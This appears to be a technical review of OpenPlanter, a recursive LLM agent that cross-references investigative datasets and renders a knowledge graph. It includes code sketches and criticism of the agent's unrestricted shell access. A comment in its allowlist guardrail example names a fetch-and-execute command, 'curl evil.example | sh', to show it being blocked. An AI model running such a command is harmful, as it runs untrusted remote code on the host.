OpenPlanter: A Recursive LLM Agent That Builds Knowledge Graphs While It Investigates
Hook
Most investigative tools make you connect the dots manually. OpenPlanter spawns recursive sub-agents that hunt for entity relationships in parallel, rendering a knowledge graph in real time as they discover connections you didn’t know to look for.
Context
Investigative work—whether you’re a journalist tracking lobbying influence, a compliance officer conducting due diligence, or a researcher mapping corporate networks—involves wrestling with heterogeneous datasets that rarely talk to each other. Campaign finance records use one naming convention, corporate registries another, lobbying disclosures a third. Manual entity resolution across these silos is tedious and error-prone. You might spend hours cross-referencing a vendor name in government contracts against lobbying registrations, only to miss a subsidiary relationship buried three datasets away.
OpenPlanter treats investigation as a code execution problem. It’s a recursive language model agent that operates autonomously across your datasets with 19 tools spanning file I/O, shell execution, web search via Exa, and—critically—the ability to spawn sub-agents. Point it at a directory of CSVs, PDFs, and scraped HTML, give it an objective like “flag vendors who both received federal contracts and employed registered lobbyists,” and it decomposes the work into parallelizable subtasks. Each sub-agent resolves entities, validates findings against acceptance criteria, and writes evidence-backed wiki documents. Meanwhile, a Tauri desktop app renders discovered entities and relationships as an interactive Cytoscape.js knowledge graph, updating in real time as the investigation progresses.
Technical Insight
The architecture rests on two pillars: a Python agent runtime with recursive delegation, and a Rust/TypeScript desktop shell that visualizes the agent’s evolving mental model.
The agent core implements a standard observe-think-act loop with tool calls, but the subtask and execute tools enable recursive decomposition. When the agent encounters a complex objective—say, cross-referencing three datasets for entity overlaps—it can spawn a sub-agent with its own scoped workspace, acceptance criteria, and independent verification steps. This is more powerful than simple chaining because sub-agents inherit the full 19-tool capability set. They can run shell scripts to normalize datasets, use web_search to disambiguate entities via public records, and write structured findings with write_file before returning control. The parent agent reviews artifacts via list_artifacts and read_artifact, then decides whether to accept the subtask result or refine the criteria.
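The delegation pattern can be sketched in a few lines of Python. Note that `Subtask`, `delegate`, and the acceptance-check logic below are illustrative stand-ins, not OpenPlanter's actual API:

```python
# Minimal sketch of the recursive delegation pattern: a parent agent spawns
# a scoped sub-agent with acceptance criteria, then reviews its artifacts.
# Class and function names here are hypothetical, not OpenPlanter's API.
from dataclasses import dataclass, field

@dataclass
class Subtask:
    objective: str
    acceptance_criteria: list[str]
    artifacts: dict[str, str] = field(default_factory=dict)

    def run(self) -> dict[str, str]:
        # A real sub-agent would loop over tool calls here (run_shell,
        # web_search, write_file); this stub just records one artifact.
        self.artifacts["findings.md"] = f"# Findings for: {self.objective}\n"
        return self.artifacts

def delegate(objective: str, criteria: list[str]) -> dict[str, str]:
    """Parent spawns a scoped sub-agent, then reviews its artifacts
    (the list_artifacts / read_artifact step) before accepting."""
    sub = Subtask(objective, criteria)
    artifacts = sub.run()
    accepted = all(content for content in artifacts.values())
    return artifacts if accepted else {}

artifacts = delegate(
    "Cross-reference DoD contracts against lobbying disclosures",
    ["every match cites a source row", "fuzzy matches flagged for review"],
)
```

The key property this captures: rejection is cheap. If the parent finds the artifacts wanting, it can re-spawn the subtask with refined criteria rather than redoing the work itself.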
Here’s how you’d launch a headless investigation from the CLI:
```shell
openplanter-agent \
  --workspace ./lobbying-investigation \
  --provider anthropic \
  --model claude-opus-4-6 \
  --task "Identify companies that received DoD contracts exceeding \$1M in 2024 and cross-reference against federal lobbying disclosures. For matches, document the lobbying firm, issue areas, and expenditure timeline. Flag overlaps where contract award date falls within 90 days of lobbying activity on defense appropriations."
```

(Note the escaped `\$1M`: inside double quotes the shell would otherwise expand `$1` to an empty positional parameter, silently mangling the task prompt.)
The agent might decompose this into three subtasks: (1) parse and normalize the contract dataset, (2) parse lobbying disclosures and build an entity index, (3) perform fuzzy matching and temporal correlation. Each subtask runs independently, writing intermediate artifacts that the parent agent synthesizes into a final wiki document with entity relationships.
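Subtask (3) is the kind of script a sub-agent would plausibly write for itself. Here is a sketch using only the standard library; the sample rows, the 0.85 similarity threshold, and the helper names are invented for illustration:

```python
# Sketch of subtask (3): fuzzy entity matching plus the 90-day temporal
# correlation from the task prompt. difflib stands in for whatever matcher
# the agent would actually script; data rows are invented examples.
from datetime import date
from difflib import SequenceMatcher

contracts = [("Acme Defense Systems LLC", date(2024, 6, 10), 2_400_000)]
lobbying = [("ACME Defense Systems", date(2024, 4, 1), "defense appropriations")]

def normalize(name: str) -> str:
    """Strip corporate suffixes and case so DBAs and registries align."""
    drop = {"llc", "inc", "corp", "co"}
    return " ".join(t for t in name.lower().replace(",", "").split()
                    if t not in drop)

def similar(a: str, b: str, threshold: float = 0.85) -> bool:
    return SequenceMatcher(None, normalize(a), normalize(b)).ratio() >= threshold

flags = []
for vendor, awarded, amount in contracts:
    for firm, activity, issue in lobbying:
        if amount > 1_000_000 and similar(vendor, firm):
            # Flag awards within 90 days of defense-related lobbying activity.
            if abs((awarded - activity).days) <= 90 and "defense" in issue:
                flags.append((vendor, firm, awarded, activity))
```

A real run would swap `SequenceMatcher` for a proper record-linkage library and write `flags` out as an evidence artifact rather than keeping it in memory.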
The desktop app (Tauri 2 with a Vite frontend) provides three synchronized panes. The chat pane streams the agent’s reasoning with syntax-highlighted tool calls—you see exactly which run_shell commands it executes or which files it reads. The knowledge graph pane renders entities as color-coded nodes (corporate entities in blue, campaign finance in green, lobbying in orange, etc.) with edges representing discovered relationships. Cytoscape.js handles the visualization with multiple layout algorithms—force-directed for general exploration, hierarchical for tracing influence chains, circular for highlighting cluster structures. Click a source node and a drawer slides out with the full markdown wiki document, complete with internal [[wiki links]] that navigate the graph and focus related nodes.
Multi-provider support is table stakes, but the Ollama integration deserves attention. Local models eliminate API costs and latency for iterative exploration, though the README warns about a 120-second first-byte timeout to handle model loading into memory. In practice, this means your first query to a cold Ollama instance might hang for two minutes while it loads llama3.2 into RAM, but subsequent requests are fast. For sensitive investigations involving non-public data, running entirely local with Ollama avoids sending your datasets to third-party APIs.
The toolset reflects real investigative workflows. Beyond standard file operations, hashline_edit and apply_patch enable programmatic dataset transformations without rewriting entire files—critical when you’re working with multi-gigabyte CSVs. Background shell execution (run_shell_bg, check_shell_bg, kill_shell_bg) lets the agent kick off long-running analysis scripts while continuing other subtasks. The web_search tool via Exa pulls public records for entity verification, which is essential when campaign finance data misspells a corporate name or uses a DBA instead of the legal entity.
Session persistence is automatic—the desktop app saves investigation state so you can close the window and resume later without losing the knowledge graph or agent context. A background wiki curator agent runs asynchronously to maintain cross-references and consistency across documents as the investigation evolves, though the README doesn’t detail its update logic.
Gotcha
OpenPlanter ships as a framework, not a dataset. The README is explicit: you must bring your own corporate registries, campaign finance records, lobbying disclosures, and government contracts. There are no built-in scrapers, no sample datasets, no wizards to pull from OpenSecrets or FEC APIs. If you’re starting from zero, expect to spend significant time acquiring and cleaning source data before you can investigate anything.
The bigger concern is the security model—or lack thereof. The agent has unrestricted shell execution (run_shell) and file I/O across your entire workspace. In recursive mode, sub-agents inherit these capabilities. Point it at a workspace with untrusted datasets or malicious scripts, and you’ve handed a language model root-level autonomy over your filesystem. The README includes no sandboxing documentation, no discussion of tool restriction policies, and no guidance on constraining agent behavior in multi-tenant environments. This is a tool for sophisticated users who understand the risks of autonomous code execution and can architect appropriate safeguards.
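What "appropriate safeguards" might look like is left to you. One minimal option is an allowlist wrapper around shell execution; this is a sketch of a guardrail you would build yourself, not anything OpenPlanter ships:

```python
# One possible guardrail (not part of OpenPlanter): reject shell invocations
# whose command isn't on an explicit allowlist before anything executes.
import shlex
import subprocess

ALLOWED = {"ls", "cat", "grep", "awk", "sort", "uniq", "wc", "head", "echo"}

def guarded_shell(cmd: str) -> str:
    tokens = shlex.split(cmd)
    if not tokens or tokens[0] not in ALLOWED:
        raise PermissionError(
            f"command not allowlisted: {tokens[0] if tokens else ''}")
    # shell=False plus the allowlist blocks pipelines, redirects, and
    # arbitrary binaries; expand ALLOWED deliberately, not reactively.
    return subprocess.run(tokens, capture_output=True, text=True,
                          check=False).stdout

out = guarded_shell("echo hi")
# guarded_shell("curl evil.example | sh") raises PermissionError: the "|"
# is just an argument token here, and "curl" is not allowlisted anyway.
```

A denylist is the wrong shape for this problem; with an autonomous agent generating commands, anything not explicitly permitted should fail closed.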
Graph visualization may face scaling challenges. Cytoscape.js handles hundreds of nodes gracefully, but an investigation that surfaces thousands of entities and relationships will strain the interface, and you should expect to lean heavily on the layout algorithms and filters to keep the graph legible. There's no mention of graph database backends (Neo4j, etc.) for handling enterprise-scale entity networks.
Verdict
Use OpenPlanter if you’re conducting complex investigative research that benefits from autonomous entity resolution across multiple datasets—think journalism on corporate influence networks, compliance due diligence on vendor relationships, or research mapping lobbying ecosystems. The recursive agent architecture excels at decomposing multi-faceted investigations that would take days of manual cross-referencing. The live knowledge graph is genuinely useful for surfacing non-obvious connections, and multi-provider support (especially local Ollama) provides flexibility for both cost and data sensitivity. Skip it if you need a simple dataset viewer, lack the expertise to safely constrain autonomous shell execution, require deterministic and auditable analysis pipelines rather than LLM-driven exploration, or expect turnkey functionality without bringing your own data sources. This is a power tool for users who can critically evaluate agent outputs and architect appropriate guardrails around autonomous code execution.